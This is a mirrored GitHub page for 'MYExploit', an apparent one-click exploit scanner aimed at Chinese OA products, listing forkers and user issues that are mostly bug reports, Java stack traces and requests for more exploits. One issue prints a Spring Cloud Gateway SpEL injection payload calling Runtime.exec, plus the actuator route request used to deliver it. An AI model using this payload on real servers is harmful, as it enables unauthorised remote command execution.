- 凉风起天末,君子意如何。🧊
achuna33 / myexploit Goto Github PK
View Code? Open in Web Editor NEWOAExploit一款基于产品的一键扫描工具。
myexploit's Introduction
myexploit's People
Contributors
Stargazers
Watchers
Forkers
sec-fork wuha0926 jasonlou tdr130 p1ach01 liutufang explangcn yzddmr6 ykankaya akunwin crackercat klinklinklin simlelcf hayasec txrw getcode2git 0r3ak lllliiillll changheluor007 b1ngda0 purewatersun anfutest dk47os3r cream-sec ningkn zo-zero-one x-team-robots sun-kids ahrendsschmidt sanchahua functfan fanyibo2009 nu1l1 coolxiao404 secd0g 3as0n futurebody rockystevejobs cn-panda tx1ee haohaodayouxi e10514001 istoliving yeshuibo chivrs gy-n redwifiteam alphabugx lighthouse-951 nuc-orz-lab darkkid0 superzero xxnbyy rebiekong qianmingtian go-bi gusechuisheng xiaozhaha notmariekondo daphne97 qianniaoge rdpmind jun-5heng atomxw rv0p111 arno567 n0ooooone xioabodo secming haiderl4911 vjingbi geekmc whatsthevuln suxioanan laowang1026 zzzz8888z jiecoll gysf666 xundididi wg1314 ekko-zhao sobinge kaaaboom ctrlaltdelet r00t7oo2jm sxx2022 wobushililaohan bysinks savior-only su-404 startagain2016 wangyanan131 moosevac ziyun01 1f3lse killer-meow mxisme zhengboss1 wwwxxxw a-newmyexploit's Issues
【bug】用友 NCCloud FS文件管理SQL注入的POC忘记改了吧?
还有下面的用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞 WriteLog("\n[*]请求地址:"+target+"/servlet/~ic/bsh.servlet.BshServlet");也是忘记改了吧。
spring默认是在一级目录的,可以根据自己的URL设置目录吗
能加个批量ip的功能?
大佬,致远的log4j和fastjson
啥时候加上嘛?送你一个小星星
ncc_JNDI
师傅你好,我看工具里面有个ncc的jndi注入,我想看下原始请求是什么,请问可以单独出一个POC或者说下大概是怎样一个思路的吗
该加洞啦
过段时间就要忙起来了
UI界面可以美化一下吗?
每次使用时都要一个一个的看是否存在漏洞,可不可以将存在漏洞的地方标红处理一下呢
去年hvv的一些漏洞可以加上
打不开软件 是对jdk环境有要求吗?
批量扫描问题
多线程有点问题
1、扫描完WriteLog没输出结果。
2、批量扫描完第一遍后,第二遍继续批量扫其他漏洞,直接报异常IndexOutOfBoundsException。
泛微OA的BUG
泛微的vul_uploadFileClient的漏洞文本提示是泛微OA weaver.common.Ctrl 任意文件上传漏洞,但payload是uploadFileClient.jsp的上传,另外好像没找到打weaver.common.Ctrl的漏洞的payload,疑似是bug遗忘了
卡死的情况
通达OA在选择all批量测试的情况下,会出现卡死的现象。
无法运行
这个怎么启动啊
这个最新版的不知道怎么启动,三个包下那一个,可以说一下吗,谢谢大佬
UI问题
使用命令执行模块,如果执行dir或者ipconfig命令,输出直接是一长串,不好阅读。可以修改成类似冰蝎的命令执行返回的效果。
build error
[INFO] --- maven-install-plugin:2.5.2:install-file (coherence) @ MYExploit ---
[ERROR] The specified file 'C:\Users\xxxxx\Downloads\MYExploit-1.6\lib\coherence.jar' not exists
[INFO] ------------------------------------------------------------------------
[INFO] BUILD FAILURE
[INFO] ------------------------------------------------------------------------
[INFO] Total time: 32.842 s
[INFO] Finished at: 2022-07-07T11:25:37+08:00
[INFO] ------------------------------------------------------------------------
[ERROR] Failed to execute goal org.apache.maven.plugins:maven-install-plugin:2.5.2:install-file (coherence) on project MYExploit: The specified file 'C:\Users\xxxx\Downloads\MYExploit-1.6\lib\coherence.jar' not exists -> [Help 1]
Landray OA treexml.tmpl script 远程代码执行漏洞
没有检测出来,手打成功了
无法选择指定漏洞测试
一般dns地址填什么,dnslog?ceye?
蓝凌OA历史漏洞
无法启动
jar文件启动不了,是对jdk版本有要求吗
这个exp可以加一下吗
java -jar 报错
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
错误: 找不到或无法加载主类 com.achuna33.MainApplication
原因: java.lang.NoClassDefFoundError: javafx/application/Application
空指针和数据越界问题
空指针问题
Exception in thread "JavaFX Application Thread" java.lang.NullPointerException
at com.sun.javafx.text.PrismTextLayout.layout(PrismTextLayout.java:1063)
at com.sun.javafx.text.PrismTextLayout.ensureLayout(PrismTextLayout.java:223)
at com.sun.javafx.text.PrismTextLayout.getBounds(PrismTextLayout.java:246)
at javafx.scene.text.Text.getLogicalBounds(Text.java:358)
at javafx.scene.text.Text.impl_computeGeomBounds(Text.java:1168)
at javafx.scene.Node.updateGeomBounds(Node.java:3579)
at javafx.scene.Node.getGeomBounds(Node.java:3532)
at javafx.scene.Node.getLocalBounds(Node.java:3480)
at javafx.scene.Node.updateTxBounds(Node.java:3643)
at javafx.scene.Node.getTransformedBounds(Node.java:3426)
at javafx.scene.Parent.getChildTransformedBounds(Parent.java:1732)
at javafx.scene.Parent.recomputeBounds(Parent.java:1524)
at javafx.scene.Parent.impl_computeGeomBounds(Parent.java:1388)
at javafx.scene.Node.updateGeomBounds(Node.java:3579)
at javafx.scene.Node.getGeomBounds(Node.java:3532)
at javafx.scene.Node.getLocalBounds(Node.java:3480)
at javafx.scene.Node.updateTxBounds(Node.java:3643)
at javafx.scene.Node.getTransformedBounds(Node.java:3426)
at javafx.scene.Parent.getChildTransformedBounds(Parent.java:1732)
at javafx.scene.Parent.updateCachedBounds(Parent.java:1596)
at javafx.scene.Parent.recomputeBounds(Parent.java:1535)
at javafx.scene.Parent.impl_computeGeomBounds(Parent.java:1388)
at javafx.scene.layout.Region.impl_computeGeomBounds(Region.java:3078)
at javafx.scene.Node.updateGeomBounds(Node.java:3579)
at javafx.scene.Node.getGeomBounds(Node.java:3532)
at javafx.scene.Node.getLocalBounds(Node.java:3480)
at javafx.scene.Node.updateTxBounds(Node.java:3643)
at javafx.scene.Node.getTransformedBounds(Node.java:3426)
at javafx.scene.Parent.getChildTransformedBounds(Parent.java:1732)
at javafx.scene.Parent.recomputeBounds(Parent.java:1524)
at javafx.scene.Parent.impl_computeGeomBounds(Parent.java:1388)
at javafx.scene.layout.Region.impl_computeGeomBounds(Region.java:3078)
at javafx.scene.Node.updateGeomBounds(Node.java:3579)
at javafx.scene.Node.getGeomBounds(Node.java:3532)
at javafx.scene.Node.getLocalBounds(Node.java:3480)
at javafx.scene.Node.updateTxBounds(Node.java:3643)
at javafx.scene.Node.getTransformedBounds(Node.java:3426)
at javafx.scene.Parent.getChildTransformedBounds(Parent.java:1732)
at javafx.scene.Parent.recomputeBounds(Parent.java:1524)
at javafx.scene.Parent.impl_computeGeomBounds(Parent.java:1388)
at javafx.scene.layout.Region.impl_computeGeomBounds(Region.java:3078)
at javafx.scene.Node.updateGeomBounds(Node.java:3579)
at javafx.scene.Node.getGeomBounds(Node.java:3532)
at javafx.scene.Node.computeLocalBounds(Node.java:3595)
at javafx.scene.Node.updateLocalBounds(Node.java:3625)
at javafx.scene.Node.getLocalBounds(Node.java:3486)
at javafx.scene.Node.updateTxBounds(Node.java:3643)
at javafx.scene.Node.getTransformedBounds(Node.java:3426)
at javafx.scene.Parent.getChildTransformedBounds(Parent.java:1732)
at javafx.scene.Parent.updateCachedBounds(Parent.java:1596)
at javafx.scene.Parent.recomputeBounds(Parent.java:1535)
at javafx.scene.Parent.impl_computeGeomBounds(Parent.java:1388)
at javafx.scene.layout.Region.impl_computeGeomBounds(Region.java:3078)
at javafx.scene.Node.updateGeomBounds(Node.java:3579)
at javafx.scene.Node.getGeomBounds(Node.java:3532)
at javafx.scene.Node.getLocalBounds(Node.java:3480)
at javafx.scene.Node.updateTxBounds(Node.java:3643)
at javafx.scene.Node.getTransformedBounds(Node.java:3426)
at javafx.scene.Parent.getChildTransformedBounds(Parent.java:1732)
at javafx.scene.Parent.recomputeBounds(Parent.java:1524)
at javafx.scene.Parent.impl_computeGeomBounds(Parent.java:1388)
at javafx.scene.layout.Region.impl_computeGeomBounds(Region.java:3078)
at javafx.scene.Node.updateGeomBounds(Node.java:3579)
at javafx.scene.Node.getGeomBounds(Node.java:3532)
at javafx.scene.Node.getLocalBounds(Node.java:3480)
at javafx.scene.Node.updateTxBounds(Node.java:3643)
at javafx.scene.Node.getTransformedBounds(Node.java:3426)
at javafx.scene.Parent.getChildTransformedBounds(Parent.java:1732)
at javafx.scene.Parent.recomputeBounds(Parent.java:1524)
at javafx.scene.Parent.impl_computeGeomBounds(Parent.java:1388)
at javafx.scene.layout.Region.impl_computeGeomBounds(Region.java:3078)
at javafx.scene.Node.updateGeomBounds(Node.java:3579)
at javafx.scene.Node.getGeomBounds(Node.java:3532)
at javafx.scene.Node.getLocalBounds(Node.java:3480)
at javafx.scene.Node.updateTxBounds(Node.java:3643)
at javafx.scene.Node.getTransformedBounds(Node.java:3426)
at javafx.scene.Parent.getChildTransformedBounds(Parent.java:1732)
at javafx.scene.Parent.recomputeBounds(Parent.java:1524)
at javafx.scene.Parent.impl_computeGeomBounds(Parent.java:1388)
at javafx.scene.layout.Region.impl_computeGeomBounds(Region.java:3078)
at javafx.scene.Node.updateGeomBounds(Node.java:3579)
at javafx.scene.Node.getGeomBounds(Node.java:3532)
at javafx.scene.Node.getLocalBounds(Node.java:3480)
at javafx.scene.Node.updateTxBounds(Node.java:3643)
at javafx.scene.Node.getTransformedBounds(Node.java:3426)
at javafx.scene.Parent.getChildTransformedBounds(Parent.java:1732)
at javafx.scene.Parent.recomputeBounds(Parent.java:1524)
at javafx.scene.Parent.impl_computeGeomBounds(Parent.java:1388)
at javafx.scene.layout.Region.impl_computeGeomBounds(Region.java:3078)
at javafx.scene.Node.updateGeomBounds(Node.java:3579)
at javafx.scene.Node.getGeomBounds(Node.java:3532)
at javafx.scene.Node.computeLocalBounds(Node.java:3595)
at javafx.scene.Node.updateLocalBounds(Node.java:3625)
at javafx.scene.Node.getLocalBounds(Node.java:3486)
at javafx.scene.Node.updateTxBounds(Node.java:3643)
at javafx.scene.Node.getTransformedBounds(Node.java:3426)
at javafx.scene.Parent.getChildTransformedBounds(Parent.java:1732)
at javafx.scene.Parent.updateCachedBounds(Parent.java:1596)
at javafx.scene.Parent.recomputeBounds(Parent.java:1535)
at javafx.scene.Parent.impl_computeGeomBounds(Parent.java:1388)
at javafx.scene.layout.Region.impl_computeGeomBounds(Region.java:3078)
at javafx.scene.Node.updateGeomBounds(Node.java:3579)
at javafx.scene.Node.getGeomBounds(Node.java:3532)
at javafx.scene.Node.lambda$static$18(Node.java:9325)
at javafx.scene.effect.Effect.getInputBounds(Effect.java:327)
at javafx.scene.effect.Bloom.impl_getBounds(Bloom.java:193)
at javafx.scene.Node.computeLocalBounds(Node.java:3592)
at javafx.scene.Node.updateLocalBounds(Node.java:3625)
at javafx.scene.Node.getLocalBounds(Node.java:3486)
at javafx.scene.Node.updateTxBounds(Node.java:3643)
at javafx.scene.Node.getTransformedBounds(Node.java:3426)
at javafx.scene.Parent.getChildTransformedBounds(Parent.java:1732)
at javafx.scene.Parent.updateCachedBounds(Parent.java:1596)
at javafx.scene.Parent.recomputeBounds(Parent.java:1535)
at javafx.scene.Parent.impl_computeGeomBounds(Parent.java:1388)
at javafx.scene.layout.Region.impl_computeGeomBounds(Region.java:3078)
at javafx.scene.Node.updateGeomBounds(Node.java:3579)
at javafx.scene.Node.getGeomBounds(Node.java:3532)
at javafx.scene.Node.getLocalBounds(Node.java:3480)
at javafx.scene.Node.impl_intersectsBounds(Node.java:5015)
at javafx.scene.layout.Region.impl_pickNodeLocal(Region.java:2931)
at javafx.scene.Node.impl_pickNode(Node.java:4914)
at javafx.scene.Scene$MouseHandler.pickNode(Scene.java:3899)
at javafx.scene.Scene$MouseHandler.access$1600(Scene.java:3485)
at javafx.scene.Scene.pick(Scene.java:1942)
at javafx.scene.Scene.access$6700(Scene.java:159)
at javafx.scene.Scene$MouseHandler.process(Scene.java:3799)
at javafx.scene.Scene$MouseHandler.access$1500(Scene.java:3485)
at javafx.scene.Scene.impl_processMouseEvent(Scene.java:1762)
at javafx.scene.Scene$ScenePeerListener.mouseEvent(Scene.java:2494)
at com.sun.javafx.tk.quantum.GlassViewEventHandler$MouseEventNotification.run(GlassViewEventHandler.java:381)
at com.sun.javafx.tk.quantum.GlassViewEventHandler$MouseEventNotification.run(GlassViewEventHandler.java:295)
at java.security.AccessController.doPrivileged(Native Method)
at com.sun.javafx.tk.quantum.GlassViewEventHandler.lambda$handleMouseEvent$354(GlassViewEventHandler.java:417)
at com.sun.javafx.tk.quantum.QuantumToolkit.runWithoutRenderLock(QuantumToolkit.java:389)
at com.sun.javafx.tk.quantum.GlassViewEventHandler.handleMouseEvent(GlassViewEventHandler.java:416)
at com.sun.glass.ui.View.handleMouseEvent(View.java:555)
at com.sun.glass.ui.View.notifyMouse(View.java:937)
数组越界问题
大牛,泛微e-mobile 前台SQL注入漏洞可以加上不
Landray OA treexml.tmpl script 远程代码执行漏洞
内存马下拉框没有内容
111111
求教
遇到错误: 找不到或无法加载主类 com.achuna33.MainApplication
请教一下
问一下这个反序列化怎么应用,填什么参数
启动后出现异常,"JavaFX Application Thread" java.lang.NullPointerException
使用java -jar xxx.jar 启动后,出现异常=_=||,这是要求的jdk有版本要求?
class java.lang.reflect.Method
Exception in thread "JavaFX Application Thread" java.lang.NullPointerException
at com.achuna33.UI.UIController$2.changed(UIController.java:267)
at com.achuna33.UI.UIController$2.changed(UIController.java:264)
at com.sun.javafx.binding.ExpressionHelper$Generic.fireValueChangedEvent(ExpressionHelper.java:361)
at com.sun.javafx.binding.ExpressionHelper.fireValueChangedEvent(ExpressionHelper.java:81)
at javafx.beans.property.ReadOnlyIntegerPropertyBase.fireValueChangedEvent(ReadOnlyIntegerPropertyBase.jav
at javafx.beans.property.ReadOnlyIntegerWrapper.fireValueChangedEvent(ReadOnlyIntegerWrapper.java:102)
at javafx.beans.property.IntegerPropertyBase.markInvalid(IntegerPropertyBase.java:113)
at javafx.beans.property.IntegerPropertyBase.set(IntegerPropertyBase.java:147)
at javafx.scene.control.SelectionModel.setSelectedIndex(SelectionModel.java:68)
at javafx.scene.control.ComboBox$ComboBoxSelectionModel.updateItemsObserver(ComboBox.java:578)
at javafx.scene.control.ComboBox$ComboBoxSelectionModel.access$400(ComboBox.java:482)
at javafx.scene.control.ComboBox$ComboBoxSelectionModel$1.invalidated(ComboBox.java:511)
at javafx.beans.WeakInvalidationListener.invalidated(WeakInvalidationListener.java:83)
at com.sun.javafx.binding.ExpressionHelper$Generic.fireValueChangedEvent(ExpressionHelper.java:349)
at com.sun.javafx.binding.ExpressionHelper.fireValueChangedEvent(ExpressionHelper.java:81)
at javafx.beans.property.ObjectPropertyBase.fireValueChangedEvent(ObjectPropertyBase.java:105)
at javafx.beans.property.ObjectPropertyBase.markInvalid(ObjectPropertyBase.java:112)
at javafx.beans.property.ObjectPropertyBase.set(ObjectPropertyBase.java:146)
at javafx.scene.control.ComboBox.setItems(ComboBox.java:286)
at com.achuna33.UI.UIController$1.changed(UIController.java:241)
at com.achuna33.UI.UIController$1.changed(UIController.java:229)
at com.sun.javafx.binding.ExpressionHelper$Generic.fireValueChangedEvent(ExpressionHelper.java:361)
at com.sun.javafx.binding.ExpressionHelper.fireValueChangedEvent(ExpressionHelper.java:81)
at javafx.beans.property.ReadOnlyIntegerPropertyBase.fireValueChangedEvent(ReadOnlyIntegerPropertyBase.jav
at javafx.beans.property.ReadOnlyIntegerWrapper.fireValueChangedEvent(ReadOnlyIntegerWrapper.java:102)
at javafx.beans.property.IntegerPropertyBase.markInvalid(IntegerPropertyBase.java:113)
at javafx.beans.property.IntegerPropertyBase.set(IntegerPropertyBase.java:147)
at javafx.scene.control.SelectionModel.setSelectedIndex(SelectionModel.java:68)
at javafx.scene.control.SingleSelectionModel.updateSelectedIndex(SingleSelectionModel.java:215)
at javafx.scene.control.SingleSelectionModel.select(SingleSelectionModel.java:149)
at com.sun.javafx.scene.control.skin.ComboBoxListViewSkin.lambda$createListView$323(ComboBoxListViewSkin.j
at com.sun.javafx.binding.ExpressionHelper$Generic.fireValueChangedEvent(ExpressionHelper.java:349)
at com.sun.javafx.binding.ExpressionHelper.fireValueChangedEvent(ExpressionHelper.java:81)
at javafx.beans.property.ReadOnlyIntegerPropertyBase.fireValueChangedEvent(ReadOnlyIntegerPropertyBase.jav
at javafx.beans.property.ReadOnlyIntegerWrapper.fireValueChangedEvent(ReadOnlyIntegerWrapper.java:102)
at javafx.beans.property.IntegerPropertyBase.markInvalid(IntegerPropertyBase.java:113)
at javafx.beans.property.IntegerPropertyBase.set(IntegerPropertyBase.java:147)
at javafx.scene.control.SelectionModel.setSelectedIndex(SelectionModel.java:68)
at javafx.scene.control.MultipleSelectionModelBase.select(MultipleSelectionModelBase.java:404)
at javafx.scene.control.MultipleSelectionModelBase.clearAndSelect(MultipleSelectionModelBase.java:356)
at javafx.scene.control.ListView$ListViewBitSetSelectionModel.clearAndSelect(ListView.java:1403)
at com.sun.javafx.scene.control.behavior.CellBehaviorBase.simpleSelect(CellBehaviorBase.java:256)
at com.sun.javafx.scene.control.behavior.CellBehaviorBase.doSelect(CellBehaviorBase.java:220)
at com.sun.javafx.scene.control.behavior.CellBehaviorBase.mousePressed(CellBehaviorBase.java:150)
at com.sun.javafx.scene.control.skin.BehaviorSkinBase$1.handle(BehaviorSkinBase.java:95)
at com.sun.javafx.scene.control.skin.BehaviorSkinBase$1.handle(BehaviorSkinBase.java:89)
at com.sun.javafx.event.CompositeEventHandler$NormalEventHandlerRecord.handleBubblingEvent(CompositeEventH
at com.sun.javafx.event.CompositeEventHandler.dispatchBubblingEvent(CompositeEventHandler.java:80)
at com.sun.javafx.event.EventHandlerManager.dispatchBubblingEvent(EventHandlerManager.java:238)
at com.sun.javafx.event.EventHandlerManager.dispatchBubblingEvent(EventHandlerManager.java:191)
at com.sun.javafx.event.CompositeEventDispatcher.dispatchBubblingEvent(CompositeEventDispatcher.java:59)
at com.sun.javafx.event.BasicEventDispatcher.dispatchEvent(BasicEventDispatcher.java:58)
at com.sun.javafx.event.EventDispatchChainImpl.dispatchEvent(EventDispatchChainImpl.java:114)
at com.sun.javafx.event.BasicEventDispatcher.dispatchEvent(BasicEventDispatcher.java:56)
at com.sun.javafx.event.EventDispatchChainImpl.dispatchEvent(EventDispatchChainImpl.java:114)
at com.sun.javafx.event.BasicEventDispatcher.dispatchEvent(BasicEventDispatcher.java:56)
at com.sun.javafx.event.EventDispatchChainImpl.dispatchEvent(EventDispatchChainImpl.java:114)
at com.sun.javafx.event.BasicEventDispatcher.dispatchEvent(BasicEventDispatcher.java:56)
at com.sun.javafx.event.EventDispatchChainImpl.dispatchEvent(EventDispatchChainImpl.java:114)
at com.sun.javafx.event.EventUtil.fireEventImpl(EventUtil.java:74)
at com.sun.javafx.event.EventUtil.fireEvent(EventUtil.java:54)
at javafx.event.Event.fireEvent(Event.java:198)
at javafx.scene.Scene$MouseHandler.process(Scene.java:3757)
at javafx.scene.Scene$MouseHandler.access$1500(Scene.java:3485)
at javafx.scene.Scene.impl_processMouseEvent(Scene.java:1762)
at javafx.scene.Scene$ScenePeerListener.mouseEvent(Scene.java:2494)
at com.sun.javafx.tk.quantum.GlassViewEventHandler$MouseEventNotification.run(GlassViewEventHandler.java:3
at com.sun.javafx.tk.quantum.GlassViewEventHandler$MouseEventNotification.run(GlassViewEventHandler.java:2
at java.security.AccessController.doPrivileged(Native Method)
at com.sun.javafx.tk.quantum.GlassViewEventHandler.lambda$handleMouseEvent$354(GlassViewEventHandler.java:
at com.sun.javafx.tk.quantum.QuantumToolkit.runWithoutRenderLock(QuantumToolkit.java:389)
at com.sun.javafx.tk.quantum.GlassViewEventHandler.handleMouseEvent(GlassViewEventHandler.java:416)
at com.sun.glass.ui.View.handleMouseEvent(View.java:555)
at com.sun.glass.ui.View.notifyMouse(View.java:937)
at com.sun.glass.ui.win.WinApplication._runLoop(Native Method)
at com.sun.glass.ui.win.WinApplication.lambda$null$148(WinApplication.java:191)
at java.lang.Thread.run(Thread.java:745)
java.lang.reflect.InvocationTargetException
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at com.achuna33.Controllers.Console.run(Console.java:23)
Caused by: java.lang.NullPointerException
at com.achuna33.Controllers.Console.GoPoc(Console.java:47)
... 5 more
java.lang.reflect.InvocationTargetException
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at com.achuna33.Controllers.Console.run(Console.java:23)
Caused by: java.lang.NullPointerException
at com.achuna33.Controllers.Console.GoPoc(Console.java:47)
... 5 more 深信服任意用户登录存在误报
深信服任意用户登录存在误报
常见OA漏洞
常见OA漏洞详情
http://wiki.peiqi.tech/wiki/oa/
I can't open it
emm,我试了1.1和1.2版本,都打不开,不知为何。java是java SE 17,点完了压根没反应,也没报错
vul_SpringGatewaySPEL模块命令执行存在一些bug
请检查vul_SpringGatewaySPEL模块
直接执行命令执行模块,发送的value值是id,而不是#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}
导致程序无法正常执行命令
下面是burp抓到的请求包
POST /actuator/gateway/routes/hacktest1 HTTP/1.1
Accept: *
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)
Content-Type: application/json
Host: ip:port
Content-Length: 202
Connection: close
{
"id": "hacktest1",
"filters": [{
"name": "AddResponseHeader",
"args": {"name": "Result","value": "id"}
}],
"uri": "http://example.com",
"order": 0
}
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.